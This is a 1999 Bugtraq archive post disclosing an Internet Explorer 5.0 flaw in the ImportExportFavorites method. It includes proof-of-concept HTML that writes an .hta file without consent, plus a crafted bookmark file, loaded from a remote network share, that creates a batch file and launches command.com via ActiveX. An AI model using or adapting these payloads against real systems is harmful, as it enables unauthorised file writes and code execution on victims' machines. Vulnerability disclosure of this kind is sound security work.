Bugtraq mailing list archives
IE 5.0 security vulnerabilities - ImportExportFavorites - at least creating and overwriting files, probably executing programs
From: joro () NAT BG (Georgi Guninski)
Date: Thu, 9 Sep 1999 16:54:33 +0300
Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this program. Georgi Guninski, bears NO responsibility for content or misuse of this program or any derivatives thereof. Description: Internet Explorer 5.0 under Windows 95/NT 4.0 (suppose Win98 is vulnerable) allows creating and overwriting local files and in SOME cases putting content in them using the window.external.ImportExportFavorites() method. In SOME cases putting content in the file is possible which means arbitrary programs may be executed. Details: The problem is the window.external.ImportExportFavorites() method, which is used to import and export bookmarks from and to Netscape Communicator. The bigger problem is it allows creating and overwriting files, which obviously leads to a dangerous DoS attack. One may overwrite critical files which may lead to reinstalling Windows. Example of this is: <SCRIPT> window.external.ImportExportFavorites(0,"c:\\fav.hta"); </SCRIPT> which will create a file c:\fav.hta, containing IE's favorites without asking the user, just notifying him the operation is successfull. In SOME cases, HTML code may be injected in the exported file by importing a specially designed HTML file. The file to be imported may reside on a samba or Windows file server and may be accessed by Microsoft Networking. The difficult part is this must be exported by using only the <A> tag, but HTML Applications help again. I have verified importing on a Windows NT 4.0 box directly connected to Internet and it worked fine. But I could not reproduce importing favorites with Windows 95 connected to Internet via dial-up, I do not have enough network resources to investigate further. I SHALL MUCH APPRECIATE SOME NETWORK GURU EXPLAIN ME WHY IMPORTING USING MICROSOFT NETWORKING DOES NOT WORK IN SOME CASES AND CONFIRM OR DENY THE POSSIBLILTY OF IMPORTING FAVORITES FROM A NETWORK FILE SEVER. It is possible to import the file using "http" protocol, but then the user must click the default button YES, Microsoft does not warn about any security problems in this case. So the code looks like this: In a HTML file: ------------------------------------------------------------------ <SCRIPT> // you must change the IP or make the file local !!!!!!!!!! window.external.ImportExportFavorites(1,"\\\\1.1.1.1\\test\\fav.imp"); // Sure, the StartUp folder is better window.external.ImportExportFavorites(0,"c:\\fav.hta"); </SCRIPT> ------------------------------------------------------------------ In the imported file (fav.imp), residing on a samba or Windows server without authentication: ------------------------------------------------------------------- <!DOCTYPE NETSCAPE-Bookmark-file-1> <DL> <DT><A HREF="#" STYLE="left:expression(eval('f= new ActiveXObject(\'Scripting.FileSystemObject\');a=f.CreateTextFile(\'C:\\\\GTEST.BAT\',true);a.WriteLine(\'echo Hi\');a.WriteLine(\'pause\');a.close();alert(\'File C:\\\\GTEST.BAT created\');window.close();'));" ADD_DATE="923225094" LAST_VISIT="934146000" LAST_MODIFIED="923225096">123456</A> <DT><A HREF="#" STYLE="left:expression(eval('a=new ActiveXObject(\'WScript.Shell\');a.run(\'c:\\command.com\');alert(\'Program started\');window.close()'));" ADD_DATE="923225094" LAST_VISIT="934146000" LAST_MODIFIED="923225096">123455</A> </DL> ------------------------------------------------------------------- To see the effect start c:\fav.hta (it may be placed in the StartUp folder and executed automatically) This vulnerability can be exploited via email or Usenet message using window.open(). The user must have installed file sharing in order remote importing to work. Workaround: Disable Active Scripting Demonstration is available at http://www.nat.bg/~joro/imp.html Regards, Georgi Guninski http://www.nat.bg/~joro
Current thread:
- Cisco and Nmap Dos Lancashire, Andrew (Aug 31)
- Re: Cisco and Nmap Dos Mikael Olsson (Sep 02)
- ProFTPD 1.2.0pre5 MacGyver (Sep 08)
- Re: Cisco and Nmap Dos Lisa Napier (Sep 08)
- 19 SCO 5.0.5+Skunware98 buffer overflows Brock Tellier (Sep 09)
- Re: Cisco and Nmap Dos Niklas Schiffler (Sep 02)
- IE 5.0 security vulnerabilities - ImportExportFavorites - at least creating and overwriting files, probably executing programs Georgi Guninski (Sep 09)
- <Possible follow-ups>
- Re: Cisco and Nmap Dos Travis Pugh (Sep 02)
- Re: Cisco and Nmap Dos Lancashire, Andrew (Sep 02)
- Re: Cisco and Nmap Dos Lisa Napier (Sep 07)
- Bindview Hackershield Password Eric Schultze (Sep 15)
- Re: Cisco and Nmap Dos Lisa Napier (Sep 15)
- Re: Cisco and Nmap Dos Mikael Olsson (Sep 02)